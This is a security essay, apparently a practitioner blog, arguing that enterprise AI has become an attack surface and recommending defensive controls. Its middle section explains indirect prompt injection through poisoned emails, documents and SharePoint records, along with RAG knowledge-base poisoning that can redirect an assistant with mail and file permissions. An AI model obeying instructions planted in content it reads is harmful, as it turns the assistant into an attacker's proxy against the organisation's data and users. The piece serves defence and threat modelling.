AI Is Now an Attack Surface. Most Security Teams Are Still Treating It Like a Tool.

The defensive posture that treats AI strictly as a tool for defenders has become a specific liability. That's not cynicism about the technology. That's where the threat intelligence points. Nation-state actors have already crossed the line from using AI to assist attacks to targeting AI systems directly. Most security teams' threat models haven't moved with them.

The shift runs across three layers: AI as a weapon in the attack chain, AI as an attack surface in its own right, and a practitioner response gap that leaves both exposures unaddressed. I'll get to what teams can do right now — but it helps to understand what's actually happening first.

From Tool to Weapon

In February 2024, Microsoft and OpenAI jointly published research documenting five nation-state-affiliated groups using LLMs to support offensive operations. Forest Blizzard (Russia/GRU) was querying satellite and radar research. Emerald Sleet (North Korea) was crafting phishing content targeting defense-sector researchers and policy think tanks. Charcoal Typhoon (China) was using LLMs for tool development and social engineering. Two more groups were running similar playbooks.

Microsoft was precise about calibration: observed use was "early stage," and all accounts were terminated. The threat isn't that AI gave these groups new capabilities. It's that AI compressed the effort cost across every phase they were already running: reconnaissance, scripting, social engineering.

The timeline data supports this, with caveats worth stating clearly. CrowdStrike's 2024 Global Threat Report put the fastest recorded adversarial breakout time at 2 minutes 7 seconds, average around 62 minutes. IBM X-Force found AI-generated spear-phishing required roughly 5 minutes of human review versus hours for manual authorship. Neither number isolates AI as the sole cause of that compression, and IBM's phishing figure comes from a controlled scenario rather than live attacker telemetry. They're real indicators, not precision benchmarks.

The attacker advantage is not a new class of attack. It's every existing attack, faster and cheaper to execute.

From Weapon to Attack Surface

Using AI to write phishing emails is different from exploiting AI systems to carry out attacks on your behalf. Most threat models still treat these as the same category. They're not.

Prompt injection is OWASP's top LLM risk (LLM01). The direct variant, where user input overrides system instructions, is the jailbreak you've probably read about. The indirect variant is the enterprise problem. If an attacker can influence content that an enterprise AI assistant reads — a poisoned email, a shared document, a SharePoint record — they can potentially redirect the AI's actions without touching any traditional attack surface. OWASP documents the scaling risk under LLM08 (Excessive Agency): an assistant with read-only context is a confused chatbot when injected. One with send-mail and file-write permissions is an attack proxy.

RAG pipeline poisoning is the longer-range version of the same problem. An attacker who can inject content into a SharePoint library or knowledge base feeding a Retrieval Augmented Generation system may be able to influence AI outputs at inference time without ever accessing the model. There are no documented production incidents of this against enterprise deployments as of early 2026, and I want to be clear about that. The attack surface is structurally real. OWASP frames it under LLM05; MITRE ATLAS documents the technique class under ML Attack Staging.

That's where the detection gap lives. Most SIEM and EDR rules are built against MITRE ATT&CK. ATLAS, which covers AI-specific attack techniques, runs as a parallel framework. The threat model expanded the moment organizations integrated AI with their data and credentials. The detection tooling hasn't kept up.

Three Moves Before You Have a Strategy

A full AI security strategy takes time to build. These three controls reduce immediate exposure without requiring one.

Treat the RAG corpus as a security boundary. SharePoint libraries and knowledge stores feeding enterprise AI deserve the same access controls and integrity monitoring as a production database. The threat vector is content injection, not network access. Most teams aren't thinking about content stores that way yet, and that's a straightforward gap to close.

Constrain AI tool permissions to least privilege. The blast radius of a successful prompt injection scales directly with what the AI can act on. Disable agentic capabilities the team isn't actively using. An AI assistant with read-only access creates an annoying incident when injected. One with send-mail and file-write capabilities creates a material one.

Establish training data provenance before fine-tuning. If the team is fine-tuning a foundation model on enterprise data, the integrity of that corpus is a security control, not a data engineering question. CISA and NSA both flag this in their joint deployment guidance. It should be owned by the security team before the first fine-tune runs, not patched in afterward.

None of these require a new platform purchase or a six-month initiative.

MITRE ATLAS is the right framework for this threat category. Most detection engineers don't know it well because it runs parallel to ATT&CK rather than integrated with it. That separation will probably narrow over time. Until it does, practitioners who want coverage for AI-specific attack techniques have to consult both frameworks.

The underlying issue is a framing problem. Organizations that don't extend their threat model when they extend their AI capabilities are choosing an exposure, not inheriting one. AI adoption doesn't automatically work in the defender's favor. It depends on whether the team also asks what the attacker's position looks like on that new terrain.

Sources

• Staying ahead of threat actors in the age of AI
• Disrupting malicious uses of AI by state-affiliated threat actors
• OWASP Top 10 for Large Language Model Applications
• MITRE ATLAS — Adversarial Threat Landscape for Artificial-Intelligence Systems
• CrowdStrike 2024 Global Threat Report
• IBM X-Force Threat Intelligence Index 2024
• Deploying AI Systems Securely

Revision History

2026-04-14 — published

Initial Publish